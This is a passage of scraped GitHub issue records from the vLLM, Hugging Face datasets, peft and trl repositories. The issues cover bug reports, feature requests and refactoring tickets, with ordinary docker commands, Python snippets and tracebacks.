back.\"},\"logprobs\":null,\"finish_reason\":\"stop\",\"stop_reason\":null,\"token_ids\":null}],\"service_tier\":null,\"system_fingerprint\":null,\"usage\":{\"prompt_tokens\":71,\"total_tokens\":109,\"completion_tokens\":38,\"prompt_tokens_details\":null},\"prompt_logprobs\":null,\"prompt_token_ids\":[200006,17360,200008,3575,553,17554,162016,11,261,4410,6439,2359,22203,656,7788,17527,558,87447,100594,25,220,1323,19,12,3218,198,6576,3521,25,220,1323,20,12,994,12,3218,279,30377,289,25,14093,279,2,13888,18403,25,8450,11,1721,13,21030,2804,413,7360,395,1753,3176,13,200007,200006,77944,200008,200007,200006,1428,200008,13225,0,200007,200006,173781],\"kv_transfer_params\":null}`\n\nI've also included in the docker container setup \n\n```\ndocker run --rm -d --name vllm-gpt-oss-120b \\\n --gpus '\"device=4,5\"' \\\n --shm-size=16g \\\n -e TORCH_CUDA_ARCH_LIST=\"9.0\" \\\n -v /mlf1-shared/user/gpt-oss-120b:/opt/model \\\n -p ${PORT}:${PORT} \\\n vllm/vllm-openai:latest\\\n --model /opt/model \\\n --served-model-name \"${SERVED_MODEL_NAME}\" \\\n --tensor-parallel-size \"${TP_SIZE}\" \\\n --gpu-memory-utilization \"${GPU_UTIL}\" \\\n --max-num-seqs 64 \\\n --port ${PORT}\n```\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28246", "state": "open", "labels": [ "bug" ], "created_at": "2025-11-06T21:08:16Z", "updated_at": "2025-11-07T00:18:25Z", "comments": 1, "user": "sophies-cerebras" }, { "repo": "vllm-project/vllm", "number": 28236, "title": "[Feature]: Implement naive prepare/finalize class to replace naive dispatching in fused_moe/layer.py", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nThe `FusedMoE` layer has a special case dispatch/combine for EP+DP when there is no specific all2all backend specified. This makes the code in `layer.py` a bit confusing and hard to follow. 
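For context, the special-cased dispatch/combine could instead sit behind the prepare/finalize abstraction, along these lines (a sketch with assumed method names, signatures, and collective helpers, not the actual vLLM interface):\n\n```python\nimport torch\n\n\nclass NaivePrepareAndFinalize:  # sketch of a FusedMoEPrepareAndFinalize subclass\n    # Hypothetical home for the naive EP+DP dispatch/combine now inlined in layer.py.\n\n    def __init__(self, ep_group):\n        # ep_group is an assumed handle to the expert-parallel process group\n        self.ep_group = ep_group\n\n    def prepare(self, hidden_states: torch.Tensor) -> torch.Tensor:\n        # Naive dispatch: replicate all tokens to every rank instead of\n        # routing each token only to the ranks that own its experts.\n        return self.ep_group.all_gather(hidden_states)\n\n    def finalize(self, expert_output: torch.Tensor) -> torch.Tensor:\n        # Naive combine: reduce-scatter the partial expert outputs back to each rank.\n        return self.ep_group.reduce_scatter(expert_output)\n```\n\n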
One way to simplify this is to implement a proper `FusedMoEPrepareAndFinalize` subclass for naive dispatch/combine.\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28236", "state": "open", "labels": [ "help wanted", "good first issue", "feature request" ], "created_at": "2025-11-06T18:38:38Z", "updated_at": "2025-11-12T06:36:29Z", "comments": 4, "user": "bnellnm" }, { "repo": "vllm-project/vllm", "number": 28233, "title": "[Usage]: LogitProcessor vLLM 0.9.1 run the same prompt 50 times with batching, apply logitprocessor independently on each", "body": "### Your current environment\n\nGoal\nRun the same prompt 50 times through vLLM 0.9.1, generating independent outputs with a custom LogitsProcessor that forces a comma token after some pattern \"xyz\" appears in each generation.\nWhat You Want\n\nBatched execution: Process all 50 generations efficiently in parallel\nIndependent state: Each of the 50 generations should have its own state in the logits processor\nPattern detection: When text ends with \"xyz\", mask all tokens except comma },\nOne-time application: Each generation should only apply the comma mask once\n\nCurrent Hurdles\n1. Processor Signature Confusion\nvLLM V0 (0.9.1) uses signature: __call__(prompt_token_ids, generated_token_ids, logits)\n\nprompt_token_ids: The input prompt tokens (same for all 50)\ngenerated_token_ids: Tokens generated so far (different per generation)\nProblem: No built-in request ID to distinguish between the 50 generations\n\n2. State Management\nWhen using the same prompt 50 times:\n\nAll generations share identical prompt_token_ids\nCan't use prompt as unique identifier\nUsing generated_token_ids as key works initially, but becomes complex as sequences diverge\nState dictionary grows indefinitely without cleanup\n\n3. Batching vs Sequential\n\nBatching (llm.generate([prompt]*50)): Processor is called for all 50 in interleaved order, making state tracking difficult\nSequential (50 separate calls): Works reliably but loses parallel efficiency\n\nWorking Solution (Sequential)\nfor i in range(50):\n processor = LookAheadProcessor(tokenizer) # Fresh processor each time\n sampling_params = SamplingParams(..., logits_processors=[processor])\n output = llm.generate([prompt], sampling_params)\nThis works because each generation gets its own processor instance.\nThe Core Problem\nvLLM V0's logits processor API doesn't provide per-request identifiers in batched scenarios, making it impossible to maintain independent state for identical prompts without workarounds like using (prompt_tokens, generated_tokens) tuples as keys - which still fails when generations produce identical token sequences early on. 
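For illustration, that keying workaround looks roughly like this (a minimal sketch; `ends_with_xyz` is a placeholder for the real pattern check and `comma_token_id` for the forced token):\n\n```python\nimport math\n\n\ndef ends_with_xyz(token_ids) -> bool:\n    # placeholder: decode token_ids and check whether the text ends with the pattern\n    return False\n\n\nclass LookAheadProcessor:\n    def __init__(self, comma_token_id: int):\n        self.comma_token_id = comma_token_id\n        self.applied = set()  # per-sequence state, keyed by token tuples\n\n    def __call__(self, prompt_token_ids, generated_token_ids, logits):\n        key = (tuple(prompt_token_ids), tuple(generated_token_ids))\n        # Keys collide whenever two generations share identical tokens so far,\n        # and the key changes every step, so one-shot tracking stays fragile.\n        if key not in self.applied and ends_with_xyz(generated_token_ids):\n            logits[:] = -math.inf  # mask everything...\n            logits[self.comma_token_id] = 0.0  # ...except the comma token\n            self.applied.add(key)\n        return logits\n```\n\n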
Does anyone know a solution to this problem?\n\n### How would you like to use vllm\n\n\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28233", "state": "open", "labels": [ "usage" ], "created_at": "2025-11-06T18:11:32Z", "updated_at": "2025-11-06T18:11:32Z", "comments": 0, "user": "jindalankush28" }, { "repo": "vllm-project/vllm", "number": 28230, "title": "[Bug]: GPU VRAM continuously increases during Qwen3-VL usage over days until OOM", "body": "### Your current environment\n\nSetup:\ndocker run -d \\\n --runtime nvidia \\\n --gpus '\"device=3,4,5,6\"' \\\n -e TRANSFORMERS_OFFLINE=1 \\\n -e DEBUG=\"true\" \\\n -p 8000:8000 \\\n --ipc=host \\\n vllm/vllm-openai:v0.11.0 \\\n --gpu-memory-utilization 0.95 \\\n --model Qwen/Qwen3-VL-235B-A22B-Instruct-FP8 \\\n --tensor-parallel-size 4 \\\n --mm-encoder-tp-mode data \\\n --enable-auto-tool-choice \\\n --tool-call-parser hermes \\\n --limit-mm-per-prompt.video 0\nServer: 8*H200 with CUDA=12.6.\n\n### \ud83d\udc1b Describe the bug\n\nThis is the same issue described in \nhttps://github.com/vllm-project/vllm/issues/27466\nhttps://github.com/vllm-project/vllm/issues/27452\nVRAM continuously increases over days of usage with vision inputs. When available VRAM drops below 500MB, OOM occurs during new requests.\nAs described in the other posts, neither removing mm_encoder_tp_mode=\"data\" nor using --enforce-eager helps.\nThere is currently no acceptable solution.\nIs there a memory leak? It is understood that VRAM usage may go up during vision tasks, but that memory should be reclaimed. VRAM should not increase continuously until it eventually hits OOM.\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28230", "state": "open", "labels": [ "bug" ], "created_at": "2025-11-06T17:19:18Z", "updated_at": "2025-12-02T16:50:26Z", "comments": 15, "user": "yz342" }, { "repo": "huggingface/datasets", "number": 7852, "title": "Problems with NifTI", "body": "### Describe the bug\n\nThere are currently 2 problems with the new NifTI feature:\n1. dealing with zipped files; this is mentioned and explained [here](https://github.com/huggingface/datasets/pull/7815#issuecomment-3496199503)\n2. when uploading via the `niftifolder` feature, the resulting parquet only contains relative paths to the nifti files:\n\n```bash\ntable['nifti']\n\n[\n -- is_valid: all not null\n -- child 0 type: binary\n [\n null,\n null,\n null,\n null,\n null,\n null\n ]\n -- child 1 type: string\n [\n \"/home/tobias/programming/github/datasets/nifti_extracted/T1.nii\",\n \"/home/tobias/programming/github/datasets/nifti_extracted/T2-interleaved.nii\",\n \"/home/tobias/programming/github/datasets/nifti_extracted/T2.nii\",\n \"/home/tobias/programming/github/datasets/nifti_extracted/T2_-interleaved.nii\",\n \"/home/tobias/programming/github/datasets/nifti_extracted/T2_.nii\",\n \"/home/tobias/programming/github/datasets/nifti_extracted/fieldmap.nii\"\n ]\n]\n```\ninstead of containing bytes. 
The code is copy pasted from PDF, so I wonder what is going wrong here.\n\n### Steps to reproduce the bug\n\nsee the linked comment\n\n### Expected behavior\n\ndownloading should work as smoothly as for pdf\n\n### Environment info\n\n- `datasets` version: 4.4.2.dev0\n- Platform: Linux-6.14.0-33-generic-x86_64-with-glibc2.39\n- Python version: 3.12.3\n- `huggingface_hub` version: 0.35.3\n- PyArrow version: 21.0.0\n- Pandas version: 2.3.3\n- `fsspec` version: 2025.9.0\n", "url": "https://github.com/huggingface/datasets/issues/7852", "state": "closed", "labels": [], "created_at": "2025-11-06T11:46:33Z", "updated_at": "2025-11-06T16:20:38Z", "comments": 2, "user": "CloseChoice" }, { "repo": "huggingface/peft", "number": 2901, "title": "AttributeError: 'float' object has no attribute 'meta'", "body": "### System Info\n\npeft== 0.17.1\ntorch== 2.5.1+cu118\ntransformers==4.57.0\npython==3.12.7\n\n### Who can help?\n\nI am trying to use LoRA with DINOv3 (so a slightly modified vit-b). However, I am hitting after a random number of iterations this error. It is sadly difficult to reproduce. Maybe someone can hint at what is going on?\n\n```\nTraceback (most recent call last):\n File \"/dkfz/cluster/gpu/data/OE0441/k539i/miniforge3/envs/nnunetv2/lib/python3.12/site-packages/torch/_dynamo/output_graph.py\", line 1446, in _call_user_compiler\n compiled_fn = compiler_fn(gm, self.example_inputs())\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/dkfz/cluster/gpu/data/OE0441/k539i/miniforge3/envs/nnunetv2/lib/python3.12/site-packages/torch/_dynamo/repro/after_dynamo.py\", line 129, in __call__\n compiled_gm = compiler_fn(gm, example_inputs)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/dkfz/cluster/gpu/data/OE0441/k539i/miniforge3/envs/nnunetv2/lib/python3.12/site-packages/torch/__init__.py\", line 2234, in __call__\n return compile_fx(model_, inputs_, config_patches=self.config)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/dkfz/cluster/gpu/data/OE0441/k539i/miniforge3/envs/nnunetv2/lib/python3.12/site-packages/torch/_inductor/compile_fx.py\", line 1521, in compile_fx\n return aot_autograd(\n ^^^^^^^^^^^^^\n File \"/dkfz/cluster/gpu/data/OE0441/k539i/miniforge3/envs/nnunetv2/lib/python3.12/site-packages/torch/_dynamo/backends/common.py\", line 72, in __call__\n cg = aot_module_simplified(gm, example_inputs, **self.kwargs)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/dkfz/cluster/gpu/data/OE0441/k539i/miniforge3/envs/nnunetv2/lib/python3.12/site-packages/torch/_functorch/aot_autograd.py\", line 1071, in aot_module_simplified\n compiled_fn = dispatch_and_compile()\n ^^^^^^^^^^^^^^^^^^^^^^\n File \"/dkfz/cluster/gpu/data/OE0441/k539i/miniforge3/envs/nnunetv2/lib/python3.12/site-packages/torch/_functorch/aot_autograd.py\", line 1056, in dispatch_and_compile\n compiled_fn, _ = create_aot_dispatcher_function(\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/dkfz/cluster/gpu/data/OE0441/k539i/miniforge3/envs/nnunetv2/lib/python3.12/site-packages/torch/_functorch/aot_autograd.py\", line 522, in create_aot_dispatcher_function\n return _create_aot_dispatcher_function(\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/dkfz/cluster/gpu/data/OE0441/k539i/miniforge3/envs/nnunetv2/lib/python3.12/site-packages/torch/_functorch/aot_autograd.py\", line 759, in _create_aot_dispatcher_function\n compiled_fn, fw_metadata = compiler_fn(\n ^^^^^^^^^^^^\n File 
\"/dkfz/cluster/gpu/data/OE0441/k539i/miniforge3/envs/nnunetv2/lib/python3.12/site-packages/torch/_functorch/_aot_autograd/jit_compile_runtime_wrappers.py\", line 179, in aot_dispatch_base\n compiled_fw = compiler(fw_module, updated_flat_args)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/dkfz/cluster/gpu/data/OE0441/k539i/miniforge3/envs/nnunetv2/lib/python3.12/site-packages/torch/_inductor/compile_fx.py\", line 1350, in fw_compiler_base\n return _fw_compiler_base(model, example_inputs, is_inference)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/dkfz/cluster/gpu/data/OE0441/k539i/miniforge3/envs/nnunetv2/lib/python3.12/site-packages/torch/_inductor/compile_fx.py\", line 1421, in _fw_compiler_base\n return inner_compile(\n ^^^^^^^^^^^^^^\n File \"/dkfz/cluster/gpu/data/OE0441/k539i/miniforge3/envs/nnunetv2/lib/python3.12/site-packages/torch/_inductor/compile_fx.py\", line 475, in compile_fx_inner\n return wrap_compiler_debug(_compile_fx_inner, compiler_name=\"inductor\")(\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/dkfz/cluster/gpu/data/OE0441/k539i/miniforge3/envs/nnunetv2/lib/python3.12/site-packages/torch/_dynamo/repro/after_aot.py\", line 85, in debug_wrapper\n inner_compiled_fn = compiler_fn(gm, example_inputs)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/dkfz/cluster/gpu/data/OE0441/k539i/miniforge3/envs/nnunetv2/lib/python3.12/site-packages/torch/_inductor/compile_fx.py\", line 661, in _compile_fx_inner\n compiled_graph = FxGraphCache.load(\n ^^^^^^^^^^^^^^^^^^\n File \"/dkfz/cluster/gpu/data/OE0441/k539i/miniforge3/envs/nnunetv2/lib/python3.12/site-packages/torch/_inductor/codecache.py\", line 1334, in load\n compiled_graph = compile_fx_fn(\n ^^^^^^^^^^^^^^\n File \"/dkfz/cluster/gpu/data/OE0441/k539i/miniforge3/envs/nnunetv2/lib/python3.12/site-packages/torch/_inductor/compile_fx.py\", line 570, in codegen_and_compile\n compiled_graph = fx_codegen_and_compile(gm, example_inputs, **fx_kwargs)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/dkfz/cluster/gpu/data/OE0441/k539i/miniforge3/envs/nnunetv2/lib/python3.12/site-packages/t", "url": "https://github.com/huggingface/peft/issues/2901", "state": "closed", "labels": [], "created_at": "2025-11-06T11:24:18Z", "updated_at": "2025-11-17T15:34:08Z", "comments": 6, "user": "Karol-G" }, { "repo": "vllm-project/vllm", "number": 28192, "title": "[RFC]: Support separate NICs for KV cache traffic and MoE traffic", "body": "### Motivation.\n\nIn MoE models with large KV caches, KV cache all-to-all and MoE expert communication share the same RNIC, causing congestion and degrading performance. 
Using dedicated NICs for each traffic type can improve bandwidth utilization and reduce interference.\n\n### Proposed Change.\n\nDoes vLLM currently support routing KV cache traffic and MoE traffic through different NICs?\n\n### Feedback Period.\n\n_No response_\n\n### CC List.\n\n_No response_\n\n### Any Other Things.\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28192", "state": "open", "labels": [ "RFC" ], "created_at": "2025-11-06T07:31:17Z", "updated_at": "2025-11-06T08:19:56Z", "comments": 1, "user": "JayFzh" }, { "repo": "vllm-project/vllm", "number": 28186, "title": "[Bug] Cannot load qwen3-vl series with lora adapter", "body": "I fine-tuned the `Qwen3-VL-8B-Instruct` model using Unsloth.\nI moved the saved QLoRA adapter and the `Qwen3-VL-2B-Instruct` model to my vLLM server.\nThen I ran a command to start model serving with vLLM as shown below. (For reference, the vLLM server has no issues\u2014it was already serving official Qwen3-VL models.)\n\n```\ncommand = [\n sys.executable, \n \"-m\", \"vllm.entrypoints.openai.api_server\",\n \"--model\", \"./Qwen3-VL-2B-Instruct\",\n \"--max_model_len\", \"3500\",\n \"--gpu_memory_utilization\", \"0.85\",\n \"--trust-remote-code\",\n \"--host\", \"0.0.0.0\",\n \"--port\", \"8888\",\n\n # for lora adapter\n \"--enable-lora\",\n \"--max-lora-rank\", \"16\", # LoRA rank\n \"--max-loras\", \"1\", \n \"--max-cpu-loras\", \"1\",\n \"--lora-modules\", \"adapter0=./my_lora_adapter\"\n]\n```\n\nI waited for vLLM to properly load the QLoRA adapter, but the following problem occurred : \nhttps://github.com/vllm-project/vllm/issues/26991\n\nWhen I was feeling hopeless, I tried merging the model instead of saving the LoRA adapter separately by using the `save_pretrained_merged()` function as shown below, and then vLLM was able to load and perform inference normally:\n\n```\n save_pretrained_merged( f\"my_16bit_model\", tokenizer, save_method=\"merged_16bit\")\n```\n\nHowever, I don't want to merge the models\u2014I want to load VL model with **LoRA** adapter.\nI\u2019ve seen many posts from others experiencing the same error.\n\nAs of now, what can I do to resolve this issue?", "url": "https://github.com/vllm-project/vllm/issues/28186", "state": "open", "labels": [ "bug" ], "created_at": "2025-11-06T06:02:33Z", "updated_at": "2025-11-09T11:16:27Z", "comments": 4, "user": "deepNoah" }, { "repo": "huggingface/trl", "number": 4481, "title": "DPOTrainer._prepare_dataset() adds an extra eos_token to conversationally formatted inputs", "body": "## Overview\nThe DPOTrainer unconditionally appends the eos_token to both the \"chosen\" and \"rejected\" sequences. Because conversationally formatted inputs will already have the chat template applied, this causes them to have duplicate eos_tokens (Ex. `...<|im_end|><|im_end|>`). \n\nA related problem was reported for the [SFTTrainer](https://github.com/huggingface/trl/issues/3318), where Qwen2.5\u2019s chat template confused the trainer\u2019s logic for detecting whether a sequence already ended with an eos_token_id. 
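A duplicate-safe append would look roughly like the following (a sketch for illustration, not the actual TRL code):\n\n```python\ndef append_eos_once(input_ids: list[int], eos_token_id: int) -> list[int]:\n    # Append EOS only when the sequence does not already end with it,\n    # so chat templates that add EOS themselves are left untouched.\n    if input_ids and input_ids[-1] == eos_token_id:\n        return list(input_ids)\n    return list(input_ids) + [eos_token_id]\n```\n\n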
The DPO case is slightly different: [DPOTrainer.tokenize_row](https://github.com/huggingface/trl/blob/main/trl/trainer/dpo_trainer.py#L738-L739) explicitly appends tokenizer.eos_token_id to both chosen_input_ids and rejected_input_ids, regardless of whether the text is standard or conversational. Even if the chat template already added the token, it will be added again.\n\n\n## Repro\n```python\nimport trl\nfrom trl import DPOTrainer, DPOConfig\nfrom transformers import AutoModelForCausalLM, AutoTokenizer\nfrom datasets import Dataset\nimport torch\n\nMODEL_ID = \"Qwen/Qwen2.5-0.5B-Instruct\"\n\n# Conversational format\nsample_data = {\n \"prompt\": [[{\"role\": \"user\", \"content\": \"What is 2+2?\"}]],\n \"chosen\": [[{\"role\": \"assistant\", \"content\": \"2+2 equals 4.\"}]],\n \"rejected\": [[{\"role\": \"assistant\", \"content\": \"I don't know math.\"}]]\n}\n\n# Convert to dataset\ntrain_dataset = Dataset.from_dict(sample_data)\n\n# Load model and tokenizer\ntokenizer = AutoTokenizer.from_pretrained(MODEL_ID)\nmodel = AutoModelForCausalLM.from_pretrained(\n MODEL_ID,\n dtype=torch.bfloat16,\n device_map=\"auto\"\n)\n\n# Setup DPO config\ndpo_config = DPOConfig(\n output_dir=\"./dpo_output\",\n per_device_train_batch_size=2,\n num_train_epochs=1,\n logging_steps=1,\n remove_unused_columns=False,\n)\n\n# Initialize DPOTrainer\ntrainer = DPOTrainer(\n model=model,\n args=dpo_config,\n train_dataset=train_dataset,\n processing_class=tokenizer,\n)\n\n# Get the processed batch\ntrain_dataloader = trainer.get_train_dataloader()\nbatch = next(iter(train_dataloader))\n\n# Decode and display the preprocessed sequences\nfor idx in range(len(batch[\"chosen_input_ids\"])):\n \n # Show prompt if available\n if \"prompt_input_ids\" in batch:\n prompt_tokens = batch[\"prompt_input_ids\"][idx]\n print(\"-\"*80)\n print(f\"PROMPT:\")\n print(\"-\"*80)\n print(tokenizer.decode(prompt_tokens, skip_special_tokens=False))\n print(\"-\"*80)\n \n # Show full chosen sequence\n chosen_tokens = batch[\"chosen_input_ids\"][idx]\n print(f\"CHOSEN SEQUENCE:\")\n print(\"-\"*80)\n print(tokenizer.decode(chosen_tokens, skip_special_tokens=False))\n print(\"-\"*80 + \"\\n\")\n \n # Show full rejected sequence\n rejected_tokens = batch[\"rejected_input_ids\"][idx]\n print(f\"REJECTED SEQUENCE:\")\n print(\"-\"*80)\n print(tokenizer.decode(rejected_tokens, skip_special_tokens=False))\n print(\"-\"*80)\n```\n\n## Outputs:\nNotice the double `<|im_end|>` tokens for the 'chosen' and 'rejected' columns.\n```\n--------------------------------------------------------------------------------\nPROMPT:\n--------------------------------------------------------------------------------\n<|im_start|>system\nYou are Qwen, created by Alibaba Cloud. 
You are a helpful assistant.<|im_end|>\n<|im_start|>user\nWhat is 2+2?<|im_end|>\n<|im_start|>assistant\n\n--------------------------------------------------------------------------------\nCHOSEN SEQUENCE:\n--------------------------------------------------------------------------------\n2+2 equals 4.<|im_end|>\n<|im_end|>\n--------------------------------------------------------------------------------\n\nREJECTED SEQUENCE:\n--------------------------------------------------------------------------------\nI don't know math.<|im_end|>\n<|im_end|>\n--------------------------------------------------------------------------------\n```\n\n\n### System Info\n\n- Platform: Linux-6.11.0-1016-nvidia-x86_64-with-glibc2.39\n- Python version: 3.12.11\n- TRL version: 0.24.0\n- PyTorch version: 2.7.1+cu128\n- accelerator(s): NVIDIA H200\n- Transformers version: 4.57.1\n- Accelerate version: 1.11.0\n- Accelerate config: not found\n- Datasets version: 4.4.1\n- HF Hub version: 0.36.0\n- bitsandbytes version: not installed\n- DeepSpeed version: not installed\n- Liger-Kernel version: not installed\n- LLM-Blender version: not installed\n- OpenAI version: not installed\n- PEFT version: not installed\n- vLLM version: not installed\n\n### Checklist\n\n- [x] I have checked that my issue isn't already filed (see [open issues](https://github.com/huggingface/trl/issues?q=is%3Aissue))\n- [x] I have included my system information\n- [x] Any code provided is minimal, complete, and reproducible ([more on MREs](https://docs.github.com/en/get-started/writing-on-github/working-with-advanced-formatting/creating-and-highlighting-code-blocks))\n- [x] Any code provided is properly formatted in code blocks, (no screenshot, [more on code blocks](https://docs.github.com/en/get-started/writing-on-github/wo", "url": "https://github.com/huggingface/trl/issues/4481", "state": "open", "labels": [ "\ud83d\udc1b bug", "\ud83c\udfcb DPO" ], "created_at": "2025-11-06T01:17:05Z", "updated_at": "2025-11-06T18:40:39Z", "comments": 0, "user": "DevonPeroutky" }, { "repo": "huggingface/trl", "number": 4468, "title": "Move RLOOTrainer to trl.experimental", "body": "## Context\n\nPart of #4223 and #4374 - Moving trainers to experimental submodule for V1.\n\n## Task\n\nMove RLOOTrainer from main trl module to trl.experimental:\n\n- [ ] Move trainer file to trl/experimental/\n- [ ] Update imports in __init__.py files\n- [ ] Update documentation\n- [ ] Add deprecation warning in old location\n- [ ] Update tests\n- [ ] Verify examples still work\n\n## Post-V1 Plan\nMay stay in trl.experimental as maintenance cost is low.\n\n## Related\n- Parent tracking issue: #4374\n- RFC: #4223\n- BCO migration (completed): #4312", "url": "https://github.com/huggingface/trl/issues/4468", "state": "closed", "labels": [ "\ud83d\udcda documentation", "\u2728 enhancement" ], "created_at": "2025-11-05T21:30:15Z", "updated_at": "2025-12-05T18:21:41Z", "comments": 2, "user": "behroozazarkhalili" }, { "repo": "huggingface/trl", "number": 4466, "title": "Move PPOTrainer to trl.experimental", "body": "## Context\n\nPart of #4223 and #4374 - Moving trainers to experimental submodule for V1.\n\n## Task\n\nMove PPOTrainer from main trl module to trl.experimental:\n\n- [ ] Move trainer file to trl/experimental/\n- [ ] Update imports in __init__.py files\n- [ ] Update documentation\n- [ ] Add deprecation warning in old location\n- [ ] Update tests\n- [ ] Verify examples still work\n\n## Post-V1 Plan\nMay stay in trl.experimental as it's an important baseline but requires heavy 
refactoring.\n\n## Related\n- Parent tracking issue: #4374\n- RFC: #4223\n- BCO migration (completed): #4312", "url": "https://github.com/huggingface/trl/issues/4466", "state": "closed", "labels": [ "\ud83d\udcda documentation", "\u2728 enhancement", "\ud83c\udfcb PPO" ], "created_at": "2025-11-05T21:29:54Z", "updated_at": "2025-11-13T19:01:20Z", "comments": 0, "user": "behroozazarkhalili" }, { "repo": "huggingface/trl", "number": 4465, "title": "Move ORPOTrainer to trl.experimental", "body": "## Context\n\nPart of #4223 and #4374 - Moving trainers to experimental submodule for V1.\n\n## Task\n\nMove ORPOTrainer from main trl module to trl.experimental:\n\n- [ ] Move trainer file to trl/experimental/\n- [ ] Update imports in __init__.py files\n- [ ] Update documentation\n- [ ] Add deprecation warning in old location\n- [ ] Update tests\n- [ ] Verify examples still work\n\n## Post-V1 Plan\nMay stay in trl.experimental.\n\n## Related\n- Parent tracking issue: #4374\n- RFC: #4223\n- BCO migration (completed): #4312", "url": "https://github.com/huggingface/trl/issues/4465", "state": "closed", "labels": [ "\ud83d\udcda documentation", "\u2728 enhancement", "\ud83c\udfcb ORPO" ], "created_at": "2025-11-05T21:29:44Z", "updated_at": "2025-11-21T06:36:32Z", "comments": 0, "user": "behroozazarkhalili" }, { "repo": "huggingface/trl", "number": 4463, "title": "Move KTOTrainer to trl.experimental", "body": "## Context\n\nPart of #4223 and #4374 - Moving trainers to experimental submodule for V1.\n\n## Task\n\nMove KTOTrainer from main trl module to trl.experimental:\n\n- [ ] Move trainer file to trl/experimental/\n- [ ] Update imports in __init__.py files\n- [ ] Update documentation\n- [ ] Add deprecation warning in old location\n- [ ] Update tests\n- [ ] Verify examples still work\n\n## Post-V1 Plan\nMay be promoted to main codebase after refactoring.\n\n## Related\n- Parent tracking issue: #4374\n- RFC: #4223\n- BCO migration (completed): #4312", "url": "https://github.com/huggingface/trl/issues/4463", "state": "open", "labels": [ "\ud83d\udcda documentation", "\u2728 enhancement", "\ud83c\udfcb KTO" ], "created_at": "2025-11-05T21:29:25Z", "updated_at": "2025-11-05T21:29:50Z", "comments": 0, "user": "behroozazarkhalili" }, { "repo": "huggingface/trl", "number": 4461, "title": "Move OnlineDPOTrainer to trl.experimental", "body": "## Context\n\nPart of #4223 and #4374 - Moving trainers to experimental submodule for V1.\n\n## Task\n\nMove OnlineDPOTrainer from main trl module to trl.experimental:\n\n- [ ] Move trainer file to trl/experimental/\n- [ ] Update imports in __init__.py files\n- [ ] Update documentation\n- [ ] Add deprecation warning in old location\n- [ ] Update tests\n- [ ] Verify examples still work\n\n## Post-V1 Plan\nMay be removed based on usage and maintenance requirements.\n\n## Related\n- Parent tracking issue: #4374\n- RFC: #4223\n- BCO migration (completed): #4312", "url": "https://github.com/huggingface/trl/issues/4461", "state": "closed", "labels": [ "\ud83d\udcda documentation", "\u2728 enhancement", "\ud83c\udfcb Online DPO" ], "created_at": "2025-11-05T21:28:08Z", "updated_at": "2025-11-24T01:13:07Z", "comments": 1, "user": "behroozazarkhalili" }, { "repo": "vllm-project/vllm", "number": 28152, "title": "[Feature]: Factor out `zero_expert_num` from `FusedMoE`", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nWe have many special cases in `FusedMoE` for `zero_expert_num`\n\nThis parameter is used exclusively for `LongCatFlash`. 
We should factor this out of `FusedMoE` and put the complexity into the model file.\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28152", "state": "open", "labels": [ "help wanted", "feature request" ], "created_at": "2025-11-05T19:05:54Z", "updated_at": "2025-11-06T20:08:23Z", "comments": 0, "user": "robertgshaw2-redhat" }, { "repo": "vllm-project/vllm", "number": 28150, "title": "[Bug]: -O.mode=NONE (or -cc.mode=NONE) should work", "body": "### Your current environment\n\nmain\n\n### \ud83d\udc1b Describe the bug\n\nRight now -O.mode only accepts integer levels. Ideally it would accept both ints and the string names.\n\n`vllm serve -O.mode=NONE` # doesn't work\n`vllm serve -O.mode=0` # does work\n\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28150", "state": "closed", "labels": [ "bug", "help wanted", "good first issue", "torch.compile" ], "created_at": "2025-11-05T18:28:23Z", "updated_at": "2025-11-12T00:46:20Z", "comments": 1, "user": "zou3519" }, { "repo": "vllm-project/vllm", "number": 28137, "title": "[Feature]: Refactor 